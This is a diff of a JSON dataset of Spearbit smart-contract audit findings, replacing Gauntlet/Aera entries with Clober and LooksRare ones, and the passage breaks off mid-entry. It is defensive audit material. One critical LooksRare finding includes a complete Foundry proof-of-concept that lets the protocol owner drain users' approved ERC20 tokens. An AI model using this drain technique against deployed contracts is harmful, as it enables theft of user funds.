inside the Aera Vault and use an immutable variable to avoiding external calls and save gas.", + "title": "Potential DoS if quoteUnit and index to price functions are set to unreasonable values", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "There are some griefing and DoS (denial-of-service) attacks for some markets that are created with bad quoteUnit and pricing functions. 1. A market order uses _take to iterate over several price indices until the order is filled. An attacker can add a tiny amount of depth to many indices (prices), increasing the gas cost and in the worst case leading to out-of-gas transactions. 2. There can only be MAX_ORDER_SIZE (32768) different orders at a single price (index). Old orders are only replaced if the previous order at the index has been fully filled. A griefer or a market maker trying to block their competition can fill the entire order queue for a price. This requires 32768 * quoteUnit quote tokens.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Gas Optimization" + "Clober", + "Severity: Informational" ] }, { - "title": "Save values in temporary variables", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "We observed multiple occurrences in the codebase where .length was used in for loops. This could lead to more gas consumption as .length gets called repetitively until the for loop finishes. When indexed variables are used multiple times inside the loop in a read only way these can be stored in a temporary variable to save some gas. for (uint256 i = 0; i < tokens.length; i++) { // tokens.length has to be calculated repeatedly ... ... = tokens[i].balanceOf(...); tokens[i].safeTransfer(owner(), ...); } // tokens[i] has to be evaluated multiple times", + "title": "Rounding rationale could be better clarified", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The rationale for rounding up / down was easier to follow if tied to the expendInput option instead.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Gas Optimization" + "Clober", + "Severity: Informational" ] }, { - "title": "Aera could be prone to out-of-gas transaction revert when managing a high number of tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The Balancer ManagedPool used by Aera has a max limit of 50 token. Functions like: initialDeposit(), deposit(), withdraw() and finalize() involve numerous external direct and indirect (made by Balancer itself when called by Aera) calls and math calculations that are done for each token managed by the pool. The functions deposit() and withdraw() are especially gas intensive, given that they also internally call calcu- lateAndDistributeManagerFees() that will transfer, for each token, a management fee to the manager. For these reasons Aera should be aware that a high number of tokens managed by the Aera Vault could lead to out-of-gas reverts (max block size depends on which chain the project will be deployed).", + "title": "Rename flashLoan() for better composability & ease of integration", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "For ease of 3rd party integration, consider renaming to flash(), as it would then have the same function sig as Uniswap V3, although the callback function would still be different.", "labels": [ "Spearbit", - "Gauntlet", + "Clober", "Severity: Informational" ] }, { - "title": "Use a consistent way to call getNormalizedWeights()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The functions deposit() and withdraw() call function getNormalizedWeights() while the function updateWeightsGradually() and cancelWeightUpdates() call pool.getNormalizedWeights(). Although this is functionally the same, it is not consistent. 29 function deposit(uint256[] calldata amounts) ... { ... uint256[] memory weights = getNormalizedWeights(); ... emit Deposit(amounts, getNormalizedWeights()); } function withdraw(uint256[] calldata amounts) ... { ... uint256[] memory weights = getNormalizedWeights(); ... emit Withdraw(amounts, allowances, getNormalizedWeights()); } function updateWeightsGradually(...) ... { ... uint256[] memory weights = pool.getNormalizedWeights(); ... } function cancelWeightUpdates() ... { ... uint256[] memory weights = pool.getNormalizedWeights(); ... } function getNormalizedWeights() ... { return pool.getNormalizedWeights(); }", + "title": "Unsupported tokens: tokens with more than 18 decimals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The orderbook does currently not support tokens with more than 18 decimals. However, having more than 18 decimals is very unusual.", "labels": [ "Spearbit", - "Gauntlet", + "Clober", "Severity: Informational" ] }, { - "title": "Add function disableTrading() to IManagerAPI.sol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The disableTrading() function can also be called by managers because of the onlyOwnerOrMan- agermodifier. However in AeraVaultV1.sol it is located in the PROTOCOL API section. It is also not present in IManagerAPI.sol. contract AeraVaultV1 is IAeraVaultV1, Ownable, ReentrancyGuard { /// PROTOCOL API /// function disableTrading() ... onlyOwnerOrManager ... { ... } /// MANAGER API /// } interface IManagerAPI { function updateWeightsGradually(...) external; function cancelWeightUpdates() external; function setSwapFee(uint256 newSwapFee) external; function claimManagerFees() external; } // disableTrading() isn't present 30", + "title": "ArithmeticPriceBook and GeometricPriceBook contracts should be abstract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The ArithmeticPriceBook and GeometricPriceBook contracts don't have any external functions.", "labels": [ "Spearbit", - "Gauntlet", + "Clober", "Severity: Informational" ] }, { - "title": "Doublecheck layout functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "Different ways are used to layout functions. Especially the part between ( ... ) and between ) ... { is sometimes done on one line and sometimes split in multiple lines. Also { is sometimes at the end of a line and sometimes at the beginning. Although the layout is not disturbing it might be useful to doublecheck it. Here are a few examples of different layouts: function updateWeights(uint256[] memory weights, uint256 weightSum) internal ... { } function depositToken(IERC20 token, uint256 amount) internal { ... } function updatePoolBalance( uint256[] memory amounts, IBVault.PoolBalanceOpKind kind ) internal { ... } function updateWeights(uint256[] memory weights, uint256 weightSum) internal ... { } function updateWeightsGradually( uint256[] calldata targetWeights, uint256 startTime, uint256 endTime ) external override onlyManager whenInitialized whenNotFinalizing { ... } function getWeightChangeRatio(uint256 weight, uint256 targetWeight) internal pure returns (uint256) { } ...", + "title": "childRawIndex in OctopusHeap.pop is not a raw index", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The OctopusHeap uses raw and heap indices. Raw indices are 0-based (root has raw index 0) and iterate the tree top to bottom, left to right. Heap indices are 1-based (root has heap index 0) and iterate the head left to right, top to bottom, but then iterate the remaining nodes octopus arm by arm. A mapping between the raw index and heap index can be obtained through _convertRawIndexToHeapIndex. The pop function defines a childRawIndex but this variable is not a raw index, it's actually raw index + 1 (1-based). 30", "labels": [ "Spearbit", - "Gauntlet", + "Clober", "Severity: Informational" ] }, { - "title": "Use Math library functions in a consistent way", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "In the AeraVaultV1 contract, the OZs Math library functions are attached to the type uint256. The min function is used as a member function whereas the max function is used as a library function.", + "title": "Lack of orderIndex validation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The orderIndex parameter in the OrderNFT contract is missing proper validation. Realistically the value should never exceed type(uint232).max as it is passed from the OrderBook contract, however, future changes to the code might potentially cause encoding/decoding ambiguity.", "labels": [ "Spearbit", - "Gauntlet", + "Clober", "Severity: Informational" ] }, { - "title": "Separation of concerns Owner and Manager", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The Owner and Manager roles are separated on purpose. Role separation usually helps to improve quality. However this separation can be broken if the Owner calls setManager(). This way the Owner can set the Manager to one of his own addresses, do Manager functions (for example setSwapFee()) and perhaps set it back to the Manager. Note: as everything happens on chain these actions can be tracked. function setManager(address newManager) external override onlyOwner { if (newManager == address(0)) { revert Aera__ManagerIsZeroAddress(); } if (initialized && noticeTimeoutAt == 0) { calculateAndDistributeManagerFees(); } emit ManagerChanged(manager, newManager); manager = newManager; }", + "title": "Unsafe _getParentHeapIndex, _getLeftChildHeapIndex", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "When heapIndex = 1 _getParentHeapIndex(uint16 heapIndex) would return 0 which is an invalid heap index. when heapIndex = 45 _getLeftChildHeapIndex(uint16 heapIndex) would return 62 which is an invalid heap index.", "labels": [ "Spearbit", - "Gauntlet", + "Clober", "Severity: Informational" ] }, { - "title": "Add modifier whenInitialized to function finalize()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The function finalize() does not have the modifier whenInitialized while most other functions have this modifier. This does not create any real issues because the function contains the check noticeTimeoutAt == 0 which can only be skipped after initiateFinalization(), and this function does have the whenInitialized modifier. function finalize() external override nonReentrant onlyOwner { // no modifier whenInitialized if (noticeTimeoutAt == 0) { // can only be set via initiateFinalization() revert Aera__FinalizationNotInitialized(); } ... }", + "title": "_priceToIndex function implemented but unused", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The _priceToIndex function for the price books are implemented but unused.", "labels": [ "Spearbit", - "Gauntlet", + "Clober", "Severity: Informational" ] }, { - "title": "Document the use of mustAllowlistLPs", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "In the Mannon Vault it is important that no other accounts can use joinPool() on the balancer pool. If other accounts are able to call joinPool(), they would get Balancer Pool Tokens (BPT) which could rise in value once more funds are added to the pool. Luckily this is prevented by the mustAllowlistLPs parameter in NewPoolParams. Readers could easily overlook this parameter. pool = IBManagedPool( IBManagedPoolFactory(factory).create( IBManagedPoolFactory.NewPoolParams({ vault: IBVault(address(0)), name: name, symbol: symbol, tokens: tokens, normalizedWeights: weights, assetManagers: managers, swapFeePercentage: swapFeePercentage, pauseWindowDuration: 0, bufferPeriodDuration: 0, owner: address(this), swapEnabledOnStart: false, mustAllowlistLPs: true, managementSwapFeePercentage: 0 // prevent other account to use joinPool }) ) );", + "title": "Incorrect _MAX_NODES and _MAX_NODES_P descriptions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The derivation of the values _MAX_NODES and MAX_NODES_P in the comments are incorrect. For _MAX_NODES C * ((S *C) ** L-1)) = 4 * ((2 * 4) ** 3) = 2048 is missing the E, or replace S * C with N. The issue isn't entirely resolved though, as it becomes C * (S * C * E) ** (L - 1) = 4 * (2 * 4 * 2) ** 3 = 16384 or 2 ** 14 Same with _MAX_NODES_P", "labels": [ "Spearbit", - "Gauntlet", + "Clober", "Severity: Informational" ] }, { - "title": "finalize can be called multiple times", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The finalize function can be called multiple time, leading to the possibility to waste gas for no reason and emitting again a conceptually wrong Finalized event. Currently, theres no check that will prevent to call the function multiple time and there is no explicit flag to allow external sources (web app, external contract) to know whether the AeraVault has been finalized or not. Scenario: the AeraVault has already been finalized but the owner (that could be a contract and not a single EOA) is not aware of it. He calls finalize again and wastes gas because of the external calls in a loop done in returnFunds and emit an additional event Finalized(owner(), [0, 0, ..., 0]) with an array of zeros in the amounts event parameter.", + "title": "marketOrder() with expendOutput reverts with SlippageError with max tolerance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "During the audit the Clober team raised this issue. Added here to track the fixes.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "Clober", + "Severity: High Risk" ] }, { - "title": "Consider updating finalize to have a more \"clean\" final state for the AeraVault/Balancer pool", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "This is just a suggestion and not an issue per se. The finalize function should ensure that the pool is in a finalized state for both a better UX and DX. Currently, the finalize function is only withdrawing all the funds from the pool after a noticePeriod but is not ensuring that the swap have been disabled and that all the rewards, entitled to the Vault (owned by the Treasury), have been claimed.", + "title": "Wrong OrderIndex could be emitted at Claim() event.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "During the audit the Clober team raised this issue. Added here to track the fixes.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "Clober", + "Severity: Low Risk" ] }, { - "title": "enableTradingWithWeights is not emitting an event for pools weight change", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "enableTradingWithWeights is both changing the pools weight and enabling the swap feature, but its only emitting the swap related event (done by calling setSwapEnabled). Both of those operations should be correctly tracked via events to be monitored by external tools.", + "title": "The Protocol owner can drain users' currency tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "The Protocol owner can drain users' currency tokens that have been approved to the protocol. Makers who want to bid on NFTs would need to approve their currency token to be spent by the protocol. The owner should not be able to access these funds for free. The owner can drain the funds as follows: 1. Calls addTransferManagerForAssetType and assigns the currency token as the transferManagerForAs- setType and IERC20.transferFrom.selector as the selectorForAssetType for a new assetType. 2. Signs an almost empty MakerAsk order and sets its collection as the address of the targeted user and the assetType to the newly created assetType. The owner also creates the corresponding TakerBid by setting the recipient field to the amount of currency they would like to transfer. 3. Calls the executeTakerBid endpoint with the above data without a merkleTree or affiliate. // file: test/foundry/Attack.t.sol pragma solidity 0.8.17; import {IStrategyManager} from \"../../contracts/interfaces/IStrategyManager.sol\"; import {IBaseStrategy} from \"../../contracts/interfaces/IBaseStrategy.sol\"; import {OrderStructs} from \"../../contracts/libraries/OrderStructs.sol\"; import {ProtocolBase} from \"./ProtocolBase.t.sol\"; import {MockERC20} from \"../mock/MockERC20.sol\"; contract NullStrategy is IBaseStrategy { function isLooksRareV2Strategy() external pure override returns (bool) { return true; } function executeNull( OrderStructs.TakerBid calldata /* takerBid */ , OrderStructs.MakerAsk calldata /* makerAsk */ ) external pure returns ( uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool isNonceInvalidated ) {} } 5 contract AttackTest is ProtocolBase { NullStrategy private nullStrategy; MockERC20 private mockERC20; uint256 private signingOwnerPK = 42; address private signingOwner = vm.addr(signingOwnerPK); address private victimUser = address(505); function setUp() public override { super.setUp(); vm.startPrank(_owner); looksRareProtocol.initiateOwnershipTransfer(signingOwner); // This particular strategy is not a requirement of the exploit. nullStrategy = new NullStrategy(); looksRareProtocol.addStrategy( 0, 0, 0, NullStrategy.executeNull.selector, false, address(nullStrategy) ); mockERC20 = new MockERC20(); looksRareProtocol.updateCurrencyWhitelistStatus(address(mockERC20), true); looksRareProtocol.updateCreatorFeeManager(address(0)); mockERC20.mint(victimUser, 1000); vm.stopPrank(); vm.prank(signingOwner); looksRareProtocol.confirmOwnershipTransfer(); } function testDrain() public { vm.prank(victimUser); mockERC20.approve(address(looksRareProtocol), 1000); vm.startPrank(signingOwner); looksRareProtocol.addTransferManagerForAssetType( 2, address(mockERC20), mockERC20.transferFrom.selector ); OrderStructs.MakerAsk memory makerAsk = _createSingleItemMakerAskOrder({ // null strategy askNonce: 0, subsetNonce: 0, strategyId: 1, assetType: 2, // ERC20 asset! orderNonce: 0, collection: victimUser, // <--- will be used as the `from` currency: address(0), signer: signingOwner, minPrice: 0, itemId: 1 }); 6 bytes memory signature = _signMakerAsk(makerAsk, signingOwnerPK); OrderStructs.TakerBid memory takerBid = OrderStructs.TakerBid( address(1000), // `amount` field for the `transferFrom` 0, makerAsk.itemIds, makerAsk.amounts, bytes(\"\") ); looksRareProtocol.executeTakerBid( takerBid, makerAsk, signature, _EMPTY_MERKLE_TREE, _EMPTY_AFFILIATE ); vm.stopPrank(); assertEq(mockERC20.balanceOf(signingOwner), 1000); assertEq(mockERC20.balanceOf(victimUser), 0); } }", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "LooksRare", + "Severity: Critical Risk" ] }, { - "title": "Document Balancer checks", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "Balancer has a large number of internal checks. Weve discussed the use of additional checks in the Aera Vault functions. The advantage of this is that it could result in more user friendly error messages. Additionally it protects against potential future change in the Balancer code. contract AeraVaultV1 is IAeraVaultV1, Ownable, ReentrancyGuard { function enableTradingWithWeights(uint256[] calldata weights) ... { { ... // doesn't check weights.length pool.updateWeightsGradually(timestamp, timestamp, weights); ... } } Balancer code: function updateWeightsGradually( ..., uint256[] memory endWeights) ... { (IERC20[] memory tokens, , ) = getVault().getPoolTokens(getPoolId()); ... InputHelpers.ensureInputLengthMatch(tokens.length, endWeights.length); // length check is here ... }", + "title": "StrategyFloorFromChainlink will often revert due to stale prices", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "The FloorFromChainlink strategy inherits from BaseStrategyChainlinkPriceLatency, so it can have a maxLatency of at most 3600 seconds. However, all of the chainlink mainnet floor price feeds have a heartbeat of 86400 seconds (24 hours), so the chainlink strategies will revert with the PriceNotRecentEnough error quite often. At the time of writing, every single mainnet floor price feed has an updateAt timestamp well over 3600 seconds in the past, meaning the strategy would always revert for any mainnet price feed right now. This may have not been realized earlier because the Goerli floor price feeds do have a heartbeat of 3600, but the mainnet heartbeat is much less frequent. One of the consequences is that users might miss out on exchanges they would have accepted. For example, if a taker bid is interested in a maker ask with an eth premium from the floor, in the likely scenario where the taker didn't log-in within 1 hour of the last oracle update, the strategy will revert and the exchange won't happen even though both parties are willing. If the floor moves up again the taker might not be interested anymore. The maker will have lost out on making a premium from the floor, and the taker would have lost out on the exchange they were willing to make.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "LooksRare", + "Severity: Medium Risk" ] }, { - "title": "Rename FinalizationInitialized to FinalizationInitiated for code consistency", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The function at L517 was renamed from initializeFinalization to initiateFinalization to avoid confusion with the Aera vault initialization. For code consistency, the corresponding event and error names should be changed.", + "title": "minPrice and maxPrice should reflect the allowed regions for the funds to be transferred from the bidder to the ask recipient", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "1. When a maker or taker sets a minPrice for an ask, the protocol should guarantee the funds they receive is at minimum the minPrice amount (currently not enforced). 2. Also reversely, when a maker or taker sets a maxPrice for a bid, the protocol should guarantee that the amount they spend is at maximum maxPrice (currently enforced). For 1. the current protocol-controlled deviation can be 30% maximum (sum of fees sent to the creator, the protocol fee recipient, and an affiliate).", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "Consider enforcing an explicit check on token order to avoid human error", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The Balancer protocol require (and enforce during the pool creation) that the pools token must be ordered by the token address. The following functions accept an uint256[] of amounts or weights without knowing if the order inside that array follow the same order of the tokens inside the Balancer pool. initialDeposit deposit withdraw enableTradingWithWeights updateWeightsGradually While its impossible to totally prevent the human error (they could specify the correct token order but wrongly swap the input order of the amount/weight) we could force the user to be more aware of the specific order in which the amounts/weights must be specified. A possible solution applied to the initialDeposit as an example could be: 37 function initialDeposit(IERC20[] calldata tokensSorted, uint256[] calldata amounts) external override onlyOwner { // ... other code IERC20[] memory tokens = getTokens(); // check that also the tokensSorted length match the lenght of other arrays if (tokens.length != amounts.length || tokens.length != tokensSorted.length) { revert Aera__AmountLengthIsNotSame( tokens.length, amounts.length ); } // ... other code for (uint256 i = 0; i < tokens.length; i++) { // check that the token position associated to the amount has the same position of the one in ,! the balancer pool if( address(tokens[i]) != address(tokensSorted[i]) ) { revert Aera__TokenOrderIsNotSame( address(tokens[i]), address(tokensSorted[i]), i ); } depositToken(tokens[i], amounts[i]); } // ... other code } Another possible implementation would be to introduce a custom struct struct TokenAmount { IERC20 token; uint256 value; } Update the function signature function initialDeposit(TokenAmount[] calldata tokenWithAmount) and up- date the example code following the new parameter model. Its important to note that while this solution will not completely prevent the human error, it will increase the gas consumption of each function.", + "title": "StrategyItemIdsRange does not invalidate makerBid.amounts[0] == 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "StrategyItemIdsRange does not check whether makerBid.amounts[0] is zero or not. If it was 0, the taker can provide empty itemIds and amounts which will cause the for loop to be skipped. The check below will also be successful since both amounts are 0: if (totalOfferedAmount != desiredAmount) { revert OrderInvalid(); } Depending on the used implementation of a transfer manager for the asset type used in this order, we might end up with the taker taking funds from the maker without providing any NFT tokens. The current implementation of TransferManager does check whether the provided itemIds have length 0 and it would revert in that case. One difference between this strategy and others are that all strategies including this one do check to revert if an amount for a specific itemId is 0 (and some of them have loops but the length of those loops depends on the parameters from the maker which enforce the loop to run at least once), but for this strategy if no itemIds are provided by the taker, the loop is skipped and one does not check whether the aggregated amount is 0 or not.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "Swap is not enabled after initialDeposit execution", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "In the current deployment flow of the AeraVault the Balancer pool is created (by the constructor) with swapEnabledOnStart set as false. When the pool receives their initial funds via initialDeposit the pool has still the swap functionality disabled. It is not explicitly clear in the specification document and in the code when the swap functionality should be enabled. If the protocol wants to enable the swap as soon as the funds are deposited in the pool, they should call, after bVault.joinPool(...), setSwapEnabled(true) or enableTradingWithWeights(uint256[] calldata weights) in case the external spot price is not aligned (both functions will also trigger a SetSwapEnabled event)", + "title": "TransferManager's owner can block token transfers for LooksRareProtocol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "In general, a deployed TransferManager ( T ) and a deployed LooksRareProtocol ( L ) might have two different owners ( OT , OL ). Assume TransferManager is used for asset types 0 and 1 (ERC721, ERC1155) in LooksRareProtocol and Trans- ferManager has marked the LooksRareProtocol as an allowed operator. At any point, OT can call removeOpera- tor to block L from calling T . If that happens, OL would need to add new (virtual) asset types (not 0 or 1) and the corresponding transfer managers for them. Makers would need to resign their orders with new asset types. Moreover, if LooksRare for the following issue \"The Protocol owner can drain users' currency tokens\" applies their solution through PR 308 which removes the ability of OL to add new asset types, then the whole protocol would need to be redeployed, since all order executions would revert.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "Remove commented code and replace input values with Balancer enum", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "Inside initialDeposit function, there is some commented code (used as example) that should be removed for clarity and future confusion. The initUserData should not use direct input values (0 in this case) but use the correct Balancers enum value to avoid any possible confusion. Following the Balancer documentation Encoding userData JoinKind The correct way to declare initUserData is using the WeightedPoolUserData.JoinKind.INIT enum value.", + "title": "transferItemsERC721 and transferBatchItemsAcrossCollections in TransferManager do not check whether an amount == 1 for an ERC721 token", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "transferItemsERC721 and transferBatchItemsAcrossCollections in TransferManager do not check whether an amount == 1 for an ERC721 token. If an operator (approved by a user) sends a 0 amount for an itemId in the context of transferring ERC721 token, TransferManager would perform those transfers, even though the logic in the operator might have meant to avoid those transfers.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "The Created event is not including all the information used to deploy the Balancer pool and are missing indexed properties", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The current Created event is defined as 39 event Created( address indexed factory, IERC20[] tokens, uint256[] weights, address manager, address validator, uint32 noticePeriod, string description ); And is missing some of the information that are used to deploy the pool. To allow external tools to better monitor the deployment of the pools, it should be better to include all the information that have been used to deploy the pool on Balancer. The following information is currently missing from the event definition: name symbol managementFee swapFeePercentage The event could also define both manager and validator as indexed event parameters to allow external tools to filter those events by those values.", + "title": "The maker cannot enforce the number of times a specific order can be fulfilled for custom strategies", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "When a maker signs an order with a specific strategy it leaves it up to the strategy to decide how many times this specific order can be fulfilled. The strategy's logic on how to decide on the returned isNonceIn- validated value, can be a complex logic in general that might be prone to errors (or have backdoors). The maker should be able to directly enforce at least an upper bound for the maximum number of fulfills for an order to avoid unexpected expenditure.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "Rename temp variable managers to assetManagers to avoid confusions and any potential future mistakes", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The managers declared in the linked code (see context) are in reality Asset Manager that have a totally different role compared to the AeraVault Manager role. The AssetManager is able to control the pools balance, withdrawing from it or depositing into it. To avoid confusion and any potential future mistakes, it should be better to rename the temporary variable managers to a more appropriate name like assetManagers. - address[] memory managers = new address[](tokens.length); + address[] memory assetManagers = new address[](tokens.length); for (uint256 i = 0; i < tokens.length; i++) { - + } managers[i] = address(this); assetManagers[i] = address(this); pool = IBManagedPool( IBManagedPoolFactory(factory).create( - + IBManagedPoolFactory.NewPoolParams({ vault: IBVault(address(0)), name: name, symbol: symbol, tokens: tokens, normalizedWeights: weights, assetManagers: managers, assetManagers: assetManagers, swapFeePercentage: swapFeePercentage, pauseWindowDuration: 0, bufferPeriodDuration: 0, owner: address(this), swapEnabledOnStart: false, mustAllowlistLPs: true, managementSwapFeePercentage: 0 }) ) ); 41", + "title": "A strategy can potentially reduce the value of a token before it gets transferred to a maker when a taker calls executeTakerAsk", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "When executeTakerAsk is called by a taker a (signed by maker) strategy will be called: (bool status, bytes memory data) = strategyInfo[makerBid.strategyId].implementation.call( abi.encodeWithSelector(strategyInfo[makerBid.strategyId].selector, takerAsk, makerBid) ); Note that this is a stateful call. This call is performed before the NFT token is transferred to the maker (signer). Even though the strategy is fixed by the maker (since the stratgeyId has been signed), the strategy's implementation might involve a complex logic that might allow (if the strategy colludes with the taker somehow) a derivative token (that is owned by / linked to the to-be-transferred token) to be reattached to another token (think of accessories for an NFT character token in a game). And so the value of the to-be-transferred token would be reduced in that sense. A maker would not be able to check for this linked derivative token ownership during the transaction since there is no post-transfer hook for the maker (except in one special case when the token involved is ERC1155 and the maker is a custom contract). Also, note that all the implemented strategies would not alter the state when they are called (their endpoints have a pure or a view visibility). There is an exception to this in the StrategyTestMultiFillCollectionOrder test contract.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "Move description declaration inside the storage slot code block", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "In the current code, the description state variable is in the block of /// STORAGE /// where all the immutable variable are re-grouped. As the dev comment say, string cannot be immutable bytecode but only set in constructor so it would be better to move it inside the /// STORAGE SLOT START /// block of variables that regroup all the non-constant and non-immutable state variables.", + "title": "An added transfer manager cannot get deactivated from the protocol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "Once a transfer manager for an asset type gets added to the protocol either through the constructor or through addTransferManagerForAssetType, if at some point there is a malicious behavior involved with the transfer manager, there is no mechanism for the protocol's owner to deactivate the transfer manager (similar to how strategies can be deactivated). If TransferManager is used for an asset type, on the TransferManager side the owner can break the link between the operator (the LooksRare protocol potentially) and the TransferManager but not the other way around.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "Remove unused imports from code", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The current implementation of the AeraVaultV1 contract is importing OpenZeppelin IERC165 inter- face, but that interface is never used or references in the code.", + "title": "Temporary DoS is possible in case orders are using tokens with blacklists", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "In the process of settling orders, _transferFungibleTokens is being called at max 4 times. In case one of these calls fails the entire transaction fails. It can only fail when an ERC20 token is used for the trade but since contracts are whitelisted in the system and probably vetted by the team, it's safe to say it's less probable that the receiver will have the ability to revert the entire transaction, although it is possible for contracts that implement a transferAndCall pattern. However, there's still the issue of transactions being reverted due to blacklistings (which have become more popular in the last year). In order to better assess the risk let's elaborate more on the 4 potential recipients of a transaction: 1. affiliate - The risk can be easily mitigated by proper handling at the front-end level. If the transaction fails due to the affiliate's address, the taker can specify address(0) as the affiliate. 2. recipient - If the transaction fails due to the recipient's address, it can only impact the taker in a gas-griefing way. 3. protocol - If the transaction fails due to the protocol's address, its address might be updated by the contract owner in the worst case. 4. creator - If the transaction fails due to the creator's address it can not be changed directly, but in the worst case creatorFeeManager can be changed.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Informational" + "LooksRare", + "Severity: Low Risk" ] }, { - "title": "shortfall is repeated twice in IWithdrawalValidator natspec comments", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The word shortfall is repeated twice in the natspec comment.", + "title": "viewCreatorFeeInfo's reversion depends on order of successful calls to collection.royaltyInfo", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "The outcome of 